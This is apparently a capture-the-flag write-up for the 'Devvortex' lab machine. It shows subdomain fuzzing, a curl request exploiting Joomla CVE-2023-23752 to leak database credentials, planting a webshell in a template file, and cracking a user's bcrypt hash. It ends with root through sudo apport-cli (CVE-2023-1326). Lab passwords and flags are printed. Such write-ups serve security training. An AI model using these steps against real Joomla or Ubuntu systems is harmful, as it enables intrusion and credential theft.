Devvortex

Recon

nmap_scan.log

HTTP (80)

Seems to be a placeholder website.

Writeup.png

Enumerate subdomains:

└─$ domain='devvortex.htb'; ffuf -u "http://$domain/" -H "Host: FUZZ.$domain" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -mc all -fw 4
       v2.1.0-dev 
dev                     [Status: 200, Size: 23221, Words: 5081, Lines: 502, Duration: 120ms]
:: Progress: [4989/4989] :: Job [1/1] :: 277 req/sec :: Duration: [0:00:10] :: Errors: 0 ::

Same vibes

Writeup-1.png

Seemed like Wordpress, but I guess not.

Writeup-2.png

Joomla

Googling The requested page can't be found. led to discovery of Joomla.

It can be enumerated with joomscan tool.

[+] Detecting Joomla Version
[++] Joomla 4.2.6

CVE-2023-23752

Joomla! CVE-2023-23752 to Code Execution

└─$ curl http://dev.devvortex.htb/api/index.php/v1/config/application?public=true -s | jq .
{
  "links": {
    "self": "http://dev.devvortex.htb/api/index.php/v1/config/application?public=true",
    "next": "http://dev.devvortex.htb/api/index.php/v1/config/application?public=true&page%5Boffset%5D=20&page%5Blimit%5D=20",
    "last": "http://dev.devvortex.htb/api/index.php/v1/config/application?public=true&page%5Boffset%5D=60&page%5Blimit%5D=20"
  },
  "data": [
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "offline": false,
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "offline_message": "This site is down for maintenance.<br>Please check back again soon.",
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "display_offline_message": 1,
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "offline_image": "",
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "sitename": "Development",
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "editor": "tinymce",
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "captcha": "0",
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "list_limit": 20,
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "access": 1,
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "debug": false,
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "debug_lang": false,
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "debug_lang_const": true,
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "dbtype": "mysqli",
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "host": "localhost",
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "user": "lewis",
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "password": "P4ntherg0t1n5r3c0n##",
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "db": "joomla",
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "dbprefix": "sd4fg_",
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "dbencryption": 0,
        "id": 224
      }
    },
    {
      "type": "application",
      "id": "224",
      "attributes": {
        "dbsslverifyservercert": false,
        "id": 224
      }
    }
  ],
  "meta": {
    "total-pages": 4
  }
}

Creds: lewis:P4ntherg0t1n5r3c0n##

RCE

System > Side Templates > Cassiopeia > Edit error.php (I used p0wny webshell)

To get webshell: http://dev.devvortex.htb/templates/cassiopeia/cassiopeia/error.php

Writeup-3.png
www-data@devvortex:…/www/dev.devvortex.htb# cat configuration.php
<?php
class JConfig {
	public $offline = false;
	public $offline_message = 'This site is down for maintenance.<br>Please check back again soon.';
	public $display_offline_message = 1;
	public $offline_image = '';
	public $sitename = 'Development';
	public $editor = 'tinymce';
	public $captcha = '0';
	public $list_limit = 20;
	public $access = 1;
	public $debug = false;
	public $debug_lang = false;
	public $debug_lang_const = true;
	public $dbtype = 'mysqli';
	public $host = 'localhost';
	public $user = 'lewis';
	public $password = 'P4ntherg0t1n5r3c0n##';
	public $db = 'joomla';
	public $dbprefix = 'sd4fg_';
	public $dbencryption = 0;
	public $dbsslverifyservercert = false;
	public $dbsslkey = '';
	public $dbsslcert = '';
	public $dbsslca = '';
	public $dbsslcipher = '';
	public $force_ssl = 0;
	public $live_site = '';
	public $secret = 'ZI7zLTbaGKliS9gq';
	public $gzip = false;
	public $error_reporting = 'default';
	public $helpurl = 'https://help.joomla.org/proxy?keyref=Help{major}{minor}:{keyref}&lang={langcode}';
	public $offset = 'UTC';
	public $mailonline = true;
	public $mailer = 'mail';
	public $mailfrom = 'lewis@devvortex.htb';
	public $fromname = 'Development';
	public $sendmail = '/usr/sbin/sendmail';
	public $smtpauth = false;
	public $smtpuser = '';
	public $smtppass = '';
	public $smtphost = 'localhost';
	public $smtpsecure = 'none';
	public $smtpport = 25;
	public $caching = 0;
	public $cache_handler = 'file';
	public $cachetime = 15;
	public $cache_platformprefix = false;
	public $MetaDesc = '';
	public $MetaAuthor = true;
	public $MetaVersion = false;
	public $robots = '';
	public $sef = true;
	public $sef_rewrite = false;
	public $sef_suffix = false;
	public $unicodeslugs = false;
	public $feed_limit = 10;
	public $feed_email = 'none';
	public $log_path = '/var/www/dev.devvortex.htb/administrator/logs';
	public $tmp_path = '/var/www/dev.devvortex.htb/tmp';
	public $lifetime = 15;
	public $session_handler = 'database';
	public $shared_session = false;
	public $session_metadata = true;
}

Database Enumration

Enumerate database:

www-data@devvortex:…/www/dev.devvortex.htb# mysql -u lewis -p'P4ntherg0t1n5r3c0n##' -e 'SHOW DATABASES;'
Database
information_schema
joomla
performance_schema

www-data@devvortex:…/www/dev.devvortex.htb# mysql -u lewis -p'P4ntherg0t1n5r3c0n##' joomla -e 'SHOW TABLES;'
Tables_in_joomla
...
sd4fg_user_keys
sd4fg_user_mfa
sd4fg_user_notes
sd4fg_user_profiles
sd4fg_user_usergroup_map
sd4fg_usergroups
sd4fg_users
...
www-data@devvortex:…/www/dev.devvortex.htb# mysql -u lewis -p'P4ntherg0t1n5r3c0n##' joomla -e 'SELECT username, password FROM sd4fg_users;'
username	password
lewis	$2y$10$6V52x.SD8Xc7hNlVwUTrI.ax4BIAYuhVBMVvnYWRceBmy8XdEzm1u
logan	$2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12

Crack the password for logan

➜ .\john-1.9.0-jumbo-1-win64\run\john.exe --wordlist=.\rockyou.txt .\hashes
Warning: detected hash type "bcrypt", but the string is also recognized as "bcrypt-opencl"
Use the "--format=bcrypt-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
tequieromucho    (?)
1g 0:00:00:11 DONE (2024-11-24 16:34) 0.08750g/s 126.0p/s 126.0c/s 126.0C/s lacoste..michel
Use the "--show" option to display all of the cracked passwords reliably
Session completed

SSH

logan is a valid user on the box

www-data@devvortex:…/www/dev.devvortex.htb# echo 'tequieromucho' | su - logan -c 'id'
Password: uid=1000(logan) gid=1000(logan) groups=1000(logan)

Creds: logan:tequieromucho

└─$ ssh logan@devvortex.htb -i id_rsa

User.txt

logan@devvortex:~$ cat user.txt
69399d0a3174a352c65bcab90c17a8e8

Privilege Escalation

logan@devvortex:~$ sudo -l
Matching Defaults entries for logan on devvortex:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User logan may run the following commands on devvortex:
    (ALL : ALL) /usr/bin/apport-cli

CVE-2023-1326-PoC

logan@devvortex:~$ sleep 60 &
[1] 2151
logan@devvortex:~$ kill -SIGSEGV 2151
logan@devvortex:~$ ls /var/crash/
_usr_bin_sleep.1000.crash
[1]+  Segmentation fault      (core dumped) sleep 60
logan@devvortex:~$ sudo /usr/bin/apport-cli -c /var/crash/_usr_bin_sleep.1000.crash

*** Send problem report to the developers?

After the problem report has been sent, please fill out the form in the
automatically opened web browser.

What would you like to do? Your options are:
  S: Send report (30.0 KB)
  V: View report
  K: Keep report file for sending later or copying to somewhere else
  I: Cancel and ignore future crashes of this program version
  C: Cancel
Please choose (S/V/K/I/C): V

*** Collecting problem information

The collected information can be sent to the developers to improve the
application. This might take a few minutes.
........................................................................................................................................................................................................................................................................................................................................................................<snip>
......................................................................ERROR: Cannot update /var/crash/_usr_bin_sleep.1000.crash: [Errno 13] Permission denied: '/var/crash/_usr_bin_sleep.1000.crash'
........!./b.in./ba.sh
root@devvortex:/home/logan# id
uid=0(root) gid=0(root) groups=0(root)

Note: The dots kept printing, but if you just enter !/bin/bash the shell will spawn.

root@devvortex:~# cat root.txt
1c4cce162d7ff2b42bc2241bdfc4d691
PreviousCodifyNextHospital

Last updated